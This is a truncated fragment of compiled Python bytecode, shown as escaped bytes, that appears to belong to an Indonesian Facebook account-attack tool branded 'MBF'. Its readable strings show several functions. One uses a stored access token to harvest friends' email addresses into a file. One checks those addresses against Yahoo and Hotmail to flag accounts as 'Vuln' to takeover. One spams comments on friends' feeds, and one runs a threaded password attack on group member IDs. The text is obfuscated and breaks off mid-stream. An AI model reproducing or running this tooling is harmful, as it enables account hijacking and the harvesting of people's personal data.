\x17|\x00\x00\x17d\x1e\x00\x17|\x04\x00\x17\x83\x01\x00}\x0b\x00qo\x01Wd\x1f\x00|\x0b\x00j\x0e\x00k\x06\x00r\xca\x01d \x00GHt\x04\x00d\t\x00\x83\x01\x00}\x0c\x00t\x05\x00\x83\x00\x00\x01n\x1c\x00d\x12\x00|\x0b\x00j\x0e\x00k\x06\x00r\xe1\x01d!\x00GHn\x05\x00d"\x00GHWq\xba\x00\x04t\x0f\x00k\n\x00r\x12\x02\x01\x01\x01d#\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01q\xba\x00Xq\xba\x00Wd\x00\x00S($\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s:\x00\x00\x00https://graph.facebook.com/me?fields=friends&access_token=R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMasukkan komen \x1b[1;97m: R\xa3\x00\x00\x00Rt\x00\x00\x00R\x1a\x00\x00\x00s1\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mKomen ke akun \x1b[1;97m: \x1b[1;96mR\x19\x00\x00\x00s7\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLanjut/Skip/keluar? (l/s/k) \x1b[1;97m: R\x0f\x00\x00\x00t\x01\x00\x00\x00St\x01\x00\x00\x00kt\x01\x00\x00\x00Ks\x1b\x00\x00\x00https://graph.facebook.com/s\x1a\x00\x00\x00?fields=feed&access_token=R\xde\x00\x00\x00s\x18\x00\x00\x00/comments/?access_token=s\t\x00\x00\x00&message=t\x05\x00\x00\x00errors/\x00\x00\x00\x1b[1;91m[Error] Tidak bisa komentar sementara...s\x1b\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mBerhasil.s\x17\x00\x00\x00\x1b[1;91m[X] Komen gagal.s\x11\x00\x00\x00\x1b[1;91m[!] Error.(\x10\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00Ry\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00R\xa4\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x1d\x00\x00\x00R\xe4\x00\x00\x00R!\x00\x00\x00R\'\x00\x00\x00(\r\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00t\x04\x00\x00\x00urlst\x05\x00\x00\x00ambilt\x06\x00\x00\x00komen1t\x01\x00\x00\x00ut\x03\x00\x00\x00idtR&\x00\x00\x00t\x05\x00\x00\x00idpost\x03\x00\x00\x00hast\x02\x00\x00\x00jat\x02\x00\x00\x00cmt\n\x00\x00\x00inputmeki2(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R5\x00\x00\x00\xe4\x03\x00\x00sX\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x13\x01\x0f\x01\r\x12\x05\x01\t\x01\x0c\x01\x15\x01\n\x01\r\x01\x0c\x01\x0c\x01\x06\x01\x0c\x01\x06\x01\x0c\x01\n\x01\x0c\x01\n\x02\x1b\x01\x0f\x01\x03\x01\x15\x01+\x01\x0f\x01\x05\x01\x0c\x01\n\x01\x0f\x01\x08\x02\t\x01\r\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xbf\x03\x00\x00g\x00\x00a\x00\x00d\x01\x00a\x01\x00yH\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00d\x04\x00GHt\x04\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01d\x07\x00GHd\x08\x00d\t\x00\x14GHd\n\x00GHWn7\x00\x04t\x07\x00k\n\x00r\x8d\x00\x01\x01\x01d\x0b\x00d\x0c\x00\x14GHd\r\x00GHd\x0e\x00GHt\x08\x00d\x0f\x00\x83\x01\x00}\x01\x00t\t\x00\x83\x00\x00\x01n\x01\x00Xd\x10\x00|\x00\x00\x17}\x02\x00t\n\x00j\x0b\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00j\x0e\x00\x83\x01\x00}\x03\x00d\x11\x00GHd\x08\x00d\x0c\x00\x14GHx\xe4\x02|\x03\x00d\x12\x00\x19D]\xd8\x02}\x04\x00t\x01\x00d\x05\x007a\x01\x00t\x00\x00j\x0f\x00t\x01\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x13\x00|\x04\x00d\x14\x00\x19\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\n\x00j\x0b\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00yv\x02t\x10\x00j\x11\x00d\x16\x00\x83\x01\x00}\x07\x00|\x07\x00j\x12\x00|\x06\x00d\x17\x00\x19\x83\x01\x00j\x13\x00\x83\x00\x00}\x08\x00d\x18\x00|\x08\x00k\x06\x00r\xc9\x02t\x14\x00j\x02\x00d\x19\x00\x83\x01\x00\x01t\x15\x00t\x14\x00j\x16\x00_\x17\x00t\x14\x00j\x18\x00d\x1a\x00d\x01\x00\x83\x00\x01\x01|\x06\x00d\x17\x00\x19t\x14\x00d\x1b\x00<t\x14\x00j\x19\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\t\x00t\x10\x00j\x11\x00d\x1c\x00\x83\x01\x00}\n\x00y\x19\x00|\n\x00j\x12\x00|\t\x00\x83\x01\x00j\x13\x00\x83\x00\x00}\x0b\x00Wn{\x00\x01\x01\x01d\x1d\x00}\x0c\x00d\x1e\x00t\x1a\x00|\x06\x00d\x17\x00\x19\x83\x01\x00\x18}\r\x00|\r\x00d\x1f\x00\x14}\x0e\x00d \x00t\x1a\x00|\x0c\x00\x83\x01\x00\x18}\x0f\x00|\x0f\x00d\x1f\x00\x14}\x10\x00d!\x00|\x06\x00d"\x00\x19\x17GHd#\x00|\x06\x00d\x17\x00\x19\x17|\x0e\x00\x17d$\x00\x17|\x0c\x00\x17|\x10\x00\x17GHd\x08\x00d\x0c\x00\x14GHw\xcc\x00n\x01\x00Xd%\x00|\x0b\x00k\x06\x00rU\x02d&\x00}\x0c\x00n\x06\x00d\x1d\x00}\x0c\x00d\x1e\x00t\x1a\x00|\x06\x00d\x17\x00\x19\x83\x01\x00\x18}\r\x00|\r\x00d\x1f\x00\x14}\x0e\x00d \x00t\x1a\x00|\x0c\x00\x83\x01\x00\x18}\x0f\x00|\x0f\x00d\x1f\x00\x14}\x10\x00d!\x00|\x06\x00d"\x00\x19\x17GHd#\x00|\x06\x00d\x17\x00\x19\x17|\x0e\x00\x17d$\x00\x17|\x0c\x00\x17|\x10\x00\x17GHd\x08\x00d\x0c\x00\x14GHn\xc6\x00d\'\x00|\x08\x00k\x06\x00r\x8f\x03d(\x00|\x06\x00d\x17\x00\x19\x17d)\x00\x17}\x11\x00t\n\x00j\x0b\x00t\x0c\x00j\r\x00|\x11\x00\x83\x01\x00j\x0e\x00\x83\x01\x00}\x12\x00|\x12\x00d*\x00\x19d\x01\x00k\x02\x00r\x1b\x03d&\x00}\x0c\x00n\x06\x00d\x1d\x00}\x0c\x00d\x1e\x00t\x1a\x00|\x06\x00d\x17\x00\x19\x83\x01\x00\x18}\r\x00|\r\x00d\x1f\x00\x14}\x0e\x00d \x00t\x1a\x00|\x0c\x00\x83\x01\x00\x18}\x0f\x00|\x0f\x00d\x1f\x00\x14}\x10\x00d!\x00|\x06\x00d"\x00\x19\x17GHd#\x00|\x06\x00d\x17\x00\x19\x17|\x0e\x00\x17d$\x00\x17|\x0c\x00\x17|\x10\x00\x17GHd\x08\x00d\x0c\x00\x14GHn\x00\x00Wq\xcc\x00\x04t\x1b\x00k\n\x00r\xa3\x03\x01\x01\x01q\xcc\x00Xq\xcc\x00Wt\x08\x00d\x0f\x00\x83\x01\x00}\x13\x00t\t\x00\x83\x00\x00\x01d\x00\x00S(+\x00\x00\x00Ni\x00\x00\x00\x00s\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s$\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar...i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMulai...Rt\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/R\x1a\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x03\x00\x00\x00@.*R;\x00\x00\x00s\t\x00\x00\x00yahoo.coms_\x00\x00\x00https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.comR:\x00\x00\x00R\xcd\x00\x00\x00s$\x00\x00\x00"messages.ERROR_INVALID_USERNAME">.*s\x13\x00\x00\x00\x1b[31m[ Tidak Vuln ]i\x1e\x00\x00\x00Rf\x00\x00\x00i\x18\x00\x00\x00s\x15\x00\x00\x00\x1b[1;92mNama \x1b[1;97m: R\x19\x00\x00\x00s\x07\x00\x00\x00\x1b[1;97ms\x05\x00\x00\x00<====s"\x00\x00\x00"messages.ERROR_INVALID_USERNAME">s\r\x00\x00\x00\x1b[32m[ Vuln ]t\x07\x00\x00\x00hotmailsP\x00\x00\x00http://apilayer.net/api/check?access_key=7a58ece2d10e54d09e93b71379677dbb&email=s\x10\x00\x00\x00&smtp=1&format=1t\n\x00\x00\x00smtp_check(\x1c\x00\x00\x00t\x01\x00\x00\x00ot\x01\x00\x00\x00hR\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R!\x00\x00\x00R#\x00\x00\x00R]\x00\x00\x00t\x07\x00\x00\x00compileR3\x00\x00\x00t\x05\x00\x00\x00groupR@\x00\x00\x00RU\x00\x00\x00RV\x00\x00\x00RW\x00\x00\x00RA\x00\x00\x00RC\x00\x00\x00R\x0c\x00\x00\x00R\'\x00\x00\x00(\x14\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00t\x02\x00\x00\x00urR*\x00\x00\x00Rd\x00\x00\x00R\r\x00\x00\x00R\xc4\x00\x00\x00t\x05\x00\x00\x00kuncit\x04\x00\x00\x00carit\x01\x00\x00\x00jt\x03\x00\x00\x00Zent\x02\x00\x00\x00cdt\x04\x00\x00\x00vulnt\x04\x00\x00\x00leant\x03\x00\x00\x00emlt\x04\x00\x00\x00lonet\x05\x00\x00\x00namelRH\x00\x00\x00R\x08\x01\x00\x00t\t\x00\x00\x00inputanya(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R4\x00\x00\x00%\x04\x00\x00s\x96\x00\x00\x00\x00\x02\x06\x01\x06\x01\x03\x01\x15\x01\x05\x01\n\x01\r\x12\x05\x01\t\x01\t\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\n\x01\x1b\x01\x05\x01\t\x01\x11\x01\n\x01\r\x01\x1f\x01\x12\x01\x03\x01\x0f\x01\x19\x01\x0c\x01\r\x01\x0c\x01\x10\x01\x0e\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x06\x01\x14\x01\n\x01\x10\x01\n\x01\r\x01\x1d\x01\t\x01\x07\x01\x0c\x01\t\x02\x06\x01\x14\x01\n\x01\x10\x01\n\x01\r\x01\x1d\x01\x0c\x01\x0c\x01\x12\x01\x1b\x01\x10\x01\t\x02\x06\x01\x14\x01\n\x01\x10\x01\n\x01\r\x01\x1d\x01\x0c\x02\x04\x01\r\x01\x08\x01\x0c\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sF\x02\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x06\x00j\x07\x00d\n\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x08\x00k\n\x00r\x86\x00\x01\x01\x01n\x01\x00Xt\x06\x00j\t\x00d\x0b\x00\x83\x01\x00\x01d\x0c\x00GHd\r\x00d\x0e\x00\x14GHd\x0f\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01d\x10\x00GHd\r\x00d\x06\x00\x14GHy\xf5\x00t\n\x00j\x0b\x00d\x11\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0c\x00j\r\x00|\x02\x00j\x0e\x00\x83\x01\x00}\x03\x00t\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00x\x93\x00|\x03\x00d\x14\x00\x19D]\x87\x00}\x05\x00t\n\x00j\x0b\x00d\x15\x00|\x05\x00d\x16\x00\x19\x17d\x17\x00\x17|\x00\x00\x17\x83\x01\x00}\x06\x00t\x0c\x00j\r\x00|\x06\x00j\x0e\x00\x83\x01\x00}\x07\x00y<\x00|\x04\x00j\x0f\x00|\x07\x00d\n\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00|\x07\x00d\x1a\x00\x19\x17GHd\x1b\x00|\x07\x00d\n\x00\x19\x17GHd\r\x00d\x06\x00\x14GHWq\x01\x01\x04t\x10\x00k\n\x00r\x87\x01\x01\x01\x01q\x01\x01Xq\x01\x01W|\x04\x00j\x11\x00\x83\x00\x00\x01d\x1c\x00GHd\x1d\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x08\x00t\x05\x00\x83\x00\x00\x01Wn\x8b\x00\x04t\x12\x00k\n\x00r\xdf\x01\x01\x01\x01d\x1e\x00GHt\x04\x00d\t\x00\x83\x01\x00}\t\x00t\x05\x00\x83\x00\x00\x01nc\x00\x04t\x10\x00k\n\x00r\x07\x02\x01\x01\x01d\x1f\x00GHt\x04\x00d\t\x00\x83\x01\x00}\n\x00t\x05\x00\x83\x00\x00\x01n;\x00\x04t\n\x00j\x13\x00j\x14\x00t\n\x00j\x13\x00j\x15\x00f\x02\x00k\n\x00rA\x02\x01\x01\x01d \x00GHt\x04\x00d\t\x00\x83\x01\x00}\x0b\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(!\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]R;\x00\x00\x00R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s0\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMengambil semua email teman...s\x1a\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMulai...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s\x0e\x00\x00\x00email/mail.txtRM\x00\x00\x00Rt\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/R\x1a\x00\x00\x00s\x0e\x00\x00\x00?access_token=s\x01\x00\x00\x00\ns\x1d\x00\x00\x00\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m R\x19\x00\x00\x00s\x1c\x00\x00\x00\x1b[1;92mMail\x1b[1;91m : \x1b[1;97ms\x19\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mSelesais4\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTersimpan \x1b[1;97m: sampah/mail.txts\x13\x00\x00\x00\x1b[1;91m[!] Terhentis \x00\x00\x00\x1b[1;91m[X] Gagal mengambil Emails\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Error(\x16\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00R\xc0\x00\x00\x00R\xc1\x00\x00\x00R\x15\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00RP\x00\x00\x00R\'\x00\x00\x00R\x86\x00\x00\x00R{\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R\xc2\x00\x00\x00(\x0c\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00R\x18\x00\x00\x00R*\x00\x00\x00R\xc3\x00\x00\x00Rd\x00\x00\x00R\r\x00\x00\x00R\xc4\x00\x00\x00t\r\x00\x00\x00inputanyamailt\x0e\x00\x00\x00inputanyamail1t\x0e\x00\x00\x00inputanyamail2t\x0e\x00\x00\x00inputanyamail3(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R0\x00\x00\x00\x87\x04\x00\x00sh\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x02\r\x12\x05\x01\t\x01\x05\x01\n\x01\x05\x01\t\x02\x03\x01\x13\x01\x12\x02\x0f\x02\x11\x01\x1f\x01\x12\x02\x03\x01\x15\x01\r\x01\r\x01\r\x01\r\x01\x08\x01\n\x02\x05\x01\x05\x01\x0c\x01\x0b\x02\r\x01\x05\x01\x0c\x01\n\x01\r\x01\x05\x01\x0c\x01\n\x01\x1f\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe5\x00\x00\x00d\x01\x00}\x00\x00t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01d\x03\x00GHd\x04\x00d\x05\x00\x14GHt\x02\x00d\x06\x00\x83\x01\x00a\x03\x00yz\x00t\x04\x00|\x00\x00d\x07\x00\x83\x02\x00a\x05\x00g\x00\x00}\x01\x00xC\x00t\x06\x00d\x08\x00\x83\x01\x00D]5\x00}\x02\x00t\x07\x00j\x08\x00d\t\x00t\t\x00d\n\x00d\x10\x00\x83\x00\x02}\x03\x00|\x03\x00j\n\x00\x83\x00\x00\x01|\x01\x00j\x0b\x00|\x03\x00\x83\x01\x00\x01qR\x00Wx\x18\x00|\x01\x00D]\x10\x00}\x03\x00|\x03\x00j\x0c\x00\x83\x00\x00\x01q\x92\x00WWn7\x00\x04t\r\x00k\n\x00r\xe0\x00\x01\x01\x01d\x0b\x00d\x0c\x00\x14GHd\r\x00GHd\x0e\x00GHt\x0e\x00d\x0f\x00\x83\x01\x00}\x04\x00t\x0f\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x11\x00\x00\x00Ns\x0b\x00\x00\x00IDgroup.txtR\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s$\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;97m: R\x18\x00\x00\x00i(\x00\x00\x00R\xd8\x00\x00\x00t\x04\x00\x00\x00argsi\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors1\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mPerlu Ambil Id dari grup dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m](\x00\x00\x00\x00(\x10\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x10\x00\x00\x00R\xb9\x00\x00\x00R\x1b\x00\x00\x00R\xb1\x00\x00\x00t\x05\x00\x00\x00rangeRn\x00\x00\x00Ro\x00\x00\x00R\xbb\x00\x00\x00t\x05\x00\x00\x00startR#\x00\x00\x00RQ\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00(\x05\x00\x00\x00t\x02\x00\x00\x00Idt\x07\x00\x00\x00threadsR\r\x00\x00\x00R\x12\x00\x00\x00R\xa6\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x81\x00\x00\x00\xd6\x04\x00\x00s(\x00\x00\x00\x00\x01\x06\x02\r\x12\x05\x01\t\x01\x0c\x01\x03\x02\x0f\x01\x06\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xe5\x00\x00\x00d\x01\x00}\x00\x00t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01d\x03\x00GHd\x04\x00d\x05\x00\x14GHt\x02\x00d\x06\x00\x83\x01\x00a\x03\x00yz\x00t\x04\x00|\x00\x00d\x07\x00\x83\x02\x00a\x05\x00g\x00\x00}\x01\x00xC\x00t\x06\x00d\x08\x00\x83\x01\x00D]5\x00}\x02\x00t\x07\x00j\x08\x00d\t\x00t\t\x00d\n\x00d\x10\x00\x83\x00\x02}\x03\x00|\x03\x00j\n\x00\x83\x00\x00\x01|\x01\x00j\x0